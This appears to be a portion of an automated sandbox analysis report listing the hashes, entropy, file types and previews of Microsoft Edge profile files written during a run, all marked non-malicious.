                                                                                                                                                                                                                                                                                                        SHA-512:2CDA7A3BA0732ECFA7DA9886F2A2A4E3782F2656D2E5E6BEB75F19421A5DA0E7FAB39B149D8AA487B3079594ED5DE75282D6CFB946D73F7C6366D876E4965504
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):4194304
                                                                                                                                                                                                                                                                                                        Entropy (8bit):0.04523041212895212
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:192:FPsy0m5tm5nOAt6YcJWpjrZXpAgiT5jhxjNEK4IQdGRQ8RIsRNSn8y08Tcm2RGOD:9X0UtqqqN2hRcuiSo08T2RGOD
                                                                                                                                                                                                                                                                                                        MD5:3A825AE9A409EB5E0426EB2F8D487811
                                                                                                                                                                                                                                                                                                        SHA1:D7C021A8C6AD702ABD9216D1274DF1465B3806BC
                                                                                                                                                                                                                                                                                                        SHA-256:7EB96535419B2CB36F20184A3B83E7D39A795B14E5F3AC46F707BDB4D500B8EE
                                                                                                                                                                                                                                                                                                        SHA-512:477A09AAC40F552C2B525DC83E2107E7B516C501179912C06E46CC68D976841C5AB1DBD162513417796C78BB8496126D21748A8C579921B8DAE682EE9C15318E
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):4194304
                                                                                                                                                                                                                                                                                                        Entropy (8bit):0.4725669323069106
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:3072:mO9ZjS89XW0WPQrgKUxevRcF2iIyv7/Nd7BXnq6toDJPr2g1HFfo:/ZjRtgKUxURcF/jNlBXnqHDJPr2aHt
                                                                                                                                                                                                                                                                                                        MD5:A7B45E7C20CA636AE6EC274A66382804
                                                                                                                                                                                                                                                                                                        SHA1:FE32A30BACAEAA3FDC0F69F4B5AD109F6B32E876
                                                                                                                                                                                                                                                                                                        SHA-256:6E52F5362B3747E5A23040A6BEE06F581F3A1F2C3131402B2A08E405B234F9FA
                                                                                                                                                                                                                                                                                                        SHA-512:ABECBCBD9EE8CF564B9514C63B4D46517045BBB8A37588A89F2F91352F2FE30C6601A468A85760255476676A38D5BD4B21230A8028A33A3FD30A9CD0109FA5F9
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):280
                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.095798522334989
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:3:FiWWltlcUpPmPIijS3XbnbO6YBVP/Sh/JzvbYuDRBOc7cEJH:o1cUh4Y3LbO/BVsJDbYuDRBOyc
                                                                                                                                                                                                                                                                                                        MD5:9F5D8B818C6B2789F5431CE5910342F0
                                                                                                                                                                                                                                                                                                        SHA1:E2F29B4FF99E6C4374DF928837D5461D2D22B52A
                                                                                                                                                                                                                                                                                                        SHA-256:39DCB8CCA33A46C13D75F4B53D9823215501BA1DCF8E6EE8136DBCA706767DC0
                                                                                                                                                                                                                                                                                                        SHA-512:D2C01F75786F51E7CE8405122FE87AD8CC26B30BFA347A98541BFE1ACB6403934948D7BC1790E8EB917D7AAC3671C79FF29E57803C7552A6250B1BB6A4D264DB
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):38627
                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.555030976031749
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:768:YQmzIVW6L7pLGLh24W5wSgf4Hl8F1+UoAYDCx9Tuqh0VfUC9xbog/OVP/EIVqUpZ:YlcVNdch24WaSgfQlu1jaqb/a7k8a3tp
                                                                                                                                                                                                                                                                                                        MD5:FB7D18FC1E4377ABE6DC27C205DF083A
                                                                                                                                                                                                                                                                                                        SHA1:B15D4DE3C2E46DACCA8DEBD36684975D4C25E6ED
                                                                                                                                                                                                                                                                                                        SHA-256:87B38406684118E9F52CB67CC9D5916529852F2EE49B523AF9C871307153C711
                                                                                                                                                                                                                                                                                                        SHA-512:201BE3AC46CF51AB9EE8FB6B9AF29951E7D0C5F7BCB880029964C4F856237B40F195F3E1F7D9B4A6B6A8B52C947774C7CD56C66426A9ED9F125B1779BF76C565
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13379538499699763","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13379538499699763","location":5,"ma
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:Unicode text, UTF-8 text, with very long lines (16987), with no line terminators
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):16989
                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.442761919000962
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:192:stXJ99QTryDigabatSuypTsvVaFvrE9kVNUNffwhtngS7yjasW8ObV+Fh/Qwvese:stXPGKSu4TsvVCDuQgRkbG1QwvAd
                                                                                                                                                                                                                                                                                                        MD5:27A6C3301FC66379D8B43EAFFE55272B
                                                                                                                                                                                                                                                                                                        SHA1:8DD7045965F53C556C9C4E21AEAF51F1B476CE26
                                                                                                                                                                                                                                                                                                        SHA-256:E144C17214CA57BE278FE9F64223A543FF8408D22FAECE3EEADC38A29515CB4B
                                                                                                                                                                                                                                                                                                        SHA-512:4E59B29EE6832E70E04A8DD74D56F8A7BBD3F3BB10A8B69FEF3D327B46EEF29E965AFF6E5AD79FE8D5D6F10165425E51E61F5FA17452A14E5DF9F55D1C7A76A0
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13379538500400205","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340961151815957","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"2caf0cf4-ea42-4083-b928-29b39da1182b":{"last_path":""},"2cb2db96-3bd0-403e-abe2-9269b3761041":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):9756
                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.108335505712741
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:192:stXkdpTsvVaFvrE9kJcW8ObV+Fh/QAsU5PCYJ:stXQTsvVCD5bG1QKd
                                                                                                                                                                                                                                                                                                        MD5:7966B4938865BBADF89F5840E6D8A0A8
                                                                                                                                                                                                                                                                                                        SHA1:C4A33ADF1A37A56CA7ABC7FE93B9456F75FFBE61
                                                                                                                                                                                                                                                                                                        SHA-256:2B1263B97D8721D6CDD31345CC48C5B837DAFD5075555A3C876F9CF49662DFC5
                                                                                                                                                                                                                                                                                                        SHA-512:27F40F81F1755085720EFA1D8B6354AB89CC9CF844DF0CD44E4D5BCDA8887DD2F3F1D583ECB715D420336DF97F4145BB5A60A64107586F278E2D6D32EECF796D
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:very short file (no magic)
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):1
                                                                                                                                                                                                                                                                                                        Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:3:L:L
                                                                                                                                                                                                                                                                                                        MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                                                                                                                                                                        SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                                                                                                                                                                        SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                                                                                                                                                                                        SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:.
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):16
                                                                                                                                                                                                                                                                                                        Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                                                        MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                                                        SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                                                        SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                                                        SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:MANIFEST-000001.
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):33
                                                                                                                                                                                                                                                                                                        Entropy (8bit):3.5394429593752084
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:3:iWstvhYNrkUn:iptAd
                                                                                                                                                                                                                                                                                                        MD5:F27314DD366903BBC6141EAE524B0FDE
                                                                                                                                                                                                                                                                                                        SHA1:4714D4A11C53CF4258C3A0246B98E5F5A01FBC12
                                                                                                                                                                                                                                                                                                        SHA-256:68C7AD234755B9EDB06832A084D092660970C89A7305E0C47D327B6AC50DD898
                                                                                                                                                                                                                                                                                                        SHA-512:07A0D529D9458DE5E46385F2A9D77E0987567BA908B53DDB1F83D40D99A72E6B2E3586B9F79C2264A83422C4E7FC6559CAC029A6F969F793F7407212BB3ECD51
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:...m.................DB_VERSION.1
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):16
                                                                                                                                                                                                                                                                                                        Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                                                        MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                                                        SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                                                        SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                                                        SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:MANIFEST-000001.
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):311
                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.246147573355154
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:6:NdFRs1N723oH+Tcwtp3hBtB2KLlbcL+q2PN723oH+Tcwtp3hBWsIFUv:ReaYebp3dFLLvVaYebp3eFUv
                                                                                                                                                                                                                                                                                                        MD5:235F3C8BF96A636E20E5AEBBA67DDB98
                                                                                                                                                                                                                                                                                                        SHA1:F6BAF8D2ABA4B3355AA71F3B00E1E3DB3DD8FB29
                                                                                                                                                                                                                                                                                                        SHA-256:6041D1D688343D18A2B2F1AC552EAB33A24DFB54B08802AF3AD7D466A5D0CA58
                                                                                                                                                                                                                                                                                                        SHA-512:0375302703E9525506152AABCEF01C06088E9850AC6DA0D49D81C140BCD258F81C25A79EC7349706AF11719BBA1A648B9D65CD5CDC409D8D6D09E6E9751A3950
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:2024/12/24-13:28:24.372 678 Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform/auto_show_data.db since it was missing..2024/12/24-13:28:24.402 678 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform/auto_show_data.db/MANIFEST-000001.
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:OpenPGP Secret Key
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):41
                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.704993772857998
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                                                                                                                                                                                        MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                                                                                                                                                                                        SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                                                                                                                                                                                        SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                                                                                                                                                                                        SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:.|.."....leveldb.BytewiseComparator......
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                                                                        Category:modified
                                                                                                                                                                                                                                                                                                        Size (bytes):2163821
                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.222864168158029
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:24576:IbPMZpVdfI/MXhZSihQgCmnVAEpENU2iOYcafbE2n:IbkZpVdfx2mjF
                                                                                                                                                                                                                                                                                                        MD5:645AACC90F695FFABD8B388E7F1542FA
                                                                                                                                                                                                                                                                                                        SHA1:EFD4A7B203CA7207605E147332C0D6643FB0F09D
                                                                                                                                                                                                                                                                                                        SHA-256:C0933F24BB478CE8A4DC498EEBD1D50FECF1F510A4731C251F66A23D97224110
                                                                                                                                                                                                                                                                                                        SHA-512:D5EB15378D64710ECC5D3A2C1DAA5A1A05BA610557D83A464588B4D57BA2512B830803C4580179907DFBD96A81365DAD8C4C44B5B00279649439856E2F81340C
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:...m.................DB_VERSION.1.f.+.................QUERY_TIMESTAMP:arbitration_priority_list4.*.*.13340960289901340.$QUERY:arbitration_priority_list4.*.*..[{"name":"arbitration_priority_list","url":"https://edgeassetservice.azureedge.net/assets/arbitration_priority_list/4.0.5/asset?sv=2017-07-29&sr=c&sig=NtPyTqjbjPElpw2mWa%2FwOk1no4JFJEK8%2BwO4xQdDJO4%3D&st=2021-01-01T00%3A00%3A00Z&se=2023-12-30T00%3A00%3A00Z&sp=r&assetgroup=ArbitrationService","version":{"major":4,"minor":0,"patch":5},"hash":"N0MkrPHaUyfTgQSPaiVpHemLMcVgqoPh/xUYLZyXayg=","size":11749}]...................'ASSET_VERSION:arbitration_priority_list.4.0.5..ASSET:arbitration_priority_list.[{. "configVersion": 32,. "PrivilegedExperiences": [. "ShorelinePrivilegedExperienceID",. "SHOPPING_AUTO_SHOW_COUPONS_CHECKOUT",. "SHOPPING_AUTO_SHOW_LOWER_PRICE_FOUND",. "SHOPPING_AUTO_SHOW_BING_SEARCH",. "SHOPPING_AUTO_SHOW_REBATES",. "SHOPPING_AUTO_SHOW_REBATES_CONFIRMATION",. "SHOPPING_AUTO_SHOW_REBATES_DEACTI
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):337
                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.120770571085677
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:6:NXt+q2PN723oH+Tcwt9Eh1tIFUt8EqwZmw+E3VkwON723oH+Tcwt9Eh15LJ:ivVaYeb9Eh16FUt8/w/+c5OaYeb9Eh1H
                                                                                                                                                                                                                                                                                                        MD5:4339EE0D1F9FECBAE97CA35C2D178A50
                                                                                                                                                                                                                                                                                                        SHA1:E14ACB0DE69ED88589E7961D9253024F8B72380C
                                                                                                                                                                                                                                                                                                        SHA-256:C1E7536A4A83F997DADCCE55863B8B1636707662EFBA2CE1D965037CE6B8E92E
                                                                                                                                                                                                                                                                                                        SHA-512:2CDC6AE0988CA932FDD05C906DA14A58360CC5E651E5964127FD66274E00B702427A5C0D04BFCF39C96C3255CE91F4B40BA75FD50483803326279A0DACC4B285
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:2024/12/24-13:28:24.153 3f8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/MANIFEST-000001.2024/12/24-13:28:24.168 3f8 Recovering log #3.2024/12/24-13:28:24.227 3f8 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/000003.log .
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):28672
                                                                                                                                                                                                                                                                                                        Entropy (8bit):0.4630702811505476
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:24:TLi5YFQq3qh7z3WMYziciNW9WkZ96UwOfBu5/ll:TouQq3qh7z3bY2LNW9WMcUvBu7l
                                                                                                                                                                                                                                                                                                        MD5:EFB6B54255FCE068F6FF2388D43A4262
                                                                                                                                                                                                                                                                                                        SHA1:5CA2A93FA1F204CA8CD7F7E7225BC367C8C0A280
                                                                                                                                                                                                                                                                                                        SHA-256:EE2DAB95993CFEA8BEC385C99468F8E997DF0490D3FEFDA70E0B13761758C542
                                                                                                                                                                                                                                                                                                        SHA-512:985F64AB4B182CB1B91E6BA0979D1BAF0547D854B7DD937B30CB1FDB1E7DF9B7170F899EF7EB6B2C3FB43C0FF47AC133FA4005F9E198129B40D80BDD1E5ABC08
                                                                                                                                                                                                                                                                                                        Malicious:false
Preview:SQLite format 3
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 5, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 5
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):10240
                                                                                                                                                                                                                                                                                                        Entropy (8bit):0.8708334089814068
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:12:LBtW4mqsmvEFUU30dZV3lY7+YNbr1dj3BzA2ycFUxOUDaazMvbKGxiTUwZ79GV:LLaqEt30J2NbDjfy6UOYMvbKGxjgm
                                                                                                                                                                                                                                                                                                        MD5:92F9F7F28AB4823C874D79EDF2F582DE
                                                                                                                                                                                                                                                                                                        SHA1:2D4F1B04C314C79D76B7FF3F50056ECA517C338B
                                                                                                                                                                                                                                                                                                        SHA-256:6318FCD9A092D1F5B30EBD9FB6AEC30B1AEBD241DC15FE1EEED3B501571DA3C7
                                                                                                                                                                                                                                                                                                        SHA-512:86FEF0E05F871A166C3FAB123B0A4B95870DCCECBE20B767AF4BDFD99653184BBBFE4CE1EDF17208B7700C969B65B8166EE264287B613641E7FDD55A6C09E6D4
                                                                                                                                                                                                                                                                                                        Malicious:false
Preview:SQLite format 3
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):352
                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.223610386278223
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:6:NXv33+q2PN723oH+TcwtnG2tMsIFUt8EXvcFVZZmw+EXvcFVNVkwON723oH+Tcwj:ZmvVaYebn9GFUt8KEN/+KE/5OaYebn9b
                                                                                                                                                                                                                                                                                                        MD5:51A748BA5E746FD23726921272777C16
                                                                                                                                                                                                                                                                                                        SHA1:1271394B88E0FB1112293C18D2032DDE89EB4B41
                                                                                                                                                                                                                                                                                                        SHA-256:68DA08D443CB1A11F40C687DD9F3CBBCFD7BD4CB979221691C28C1D92D09255D
                                                                                                                                                                                                                                                                                                        SHA-512:F295082FC79D0AB42E15C0D3E7BCC061E1834540FC7FB9BDA45DEC322512282869B9245FB772F07A6D200C3BEDF63145A955C0807739751D0CE238B83A971D24
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:2024/12/24-13:28:19.798 17d8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/MANIFEST-000001.2024/12/24-13:28:19.799 17d8 Recovering log #3.2024/12/24-13:28:19.799 17d8 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/000003.log .
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 6
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):20480
                                                                                                                                                                                                                                                                                                        Entropy (8bit):0.6129194872972638
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:24:TLapR+DDNzWjJ0npnyXKUO8+j8jxp9jI4mL:TO8D4jJ/6Up+Ah2
                                                                                                                                                                                                                                                                                                        MD5:9E09DCE4692F935167B522C5C9890311
                                                                                                                                                                                                                                                                                                        SHA1:733966A04DCE4FE044E4BD4BFFE254D962CB0256
                                                                                                                                                                                                                                                                                                        SHA-256:1CCF1076E897A26A02B02D17EB73302C2F1F80344B5CAD7C0B1A3311DC03F541
                                                                                                                                                                                                                                                                                                        SHA-512:D2207D359F25CB00FF24DC3E438B8F7D9DAB179285116519EE85F560D7BA80962B8C8D37A1AE0804E17EFB520EE71056E786933744748F6CEA3E8468F9764C65
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................j...%.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):16
                                                                                                                                                                                                                                                                                                        Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                                                        MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                                                        SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                                                        SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                                                        SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:MANIFEST-000001.
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):375520
                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.35414129061542
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:6144:hA/imBpx6WdPSxKWcHu5MURacq49QxxPnyEndBuHltBfdK5WNbsVEziP/CfXtLPz:hFdMyq49tEndBuHltBfdK5WNbsVEziPU
                                                                                                                                                                                                                                                                                                        MD5:93A4A8D46402D081934CCFD0CBEB0DD7
                                                                                                                                                                                                                                                                                                        SHA1:ABCEFCCEF3B8EBC6566BCFCD56B56BC96F81EE50
                                                                                                                                                                                                                                                                                                        SHA-256:1682DFCC1CA505142C4573F8FCAAAAF1F51235D670C42690A2F3825A8D44223D
                                                                                                                                                                                                                                                                                                        SHA-512:75224A33A1D7ADBFE63B3481AB99051C0C4952ED8C832802A52181615FE5605F12148979F7126351862A3C31ECF9F9F5644C5E32967516B6FAF88CF71375A8ED
                                                                                                                                                                                                                                                                                                        Malicious:false
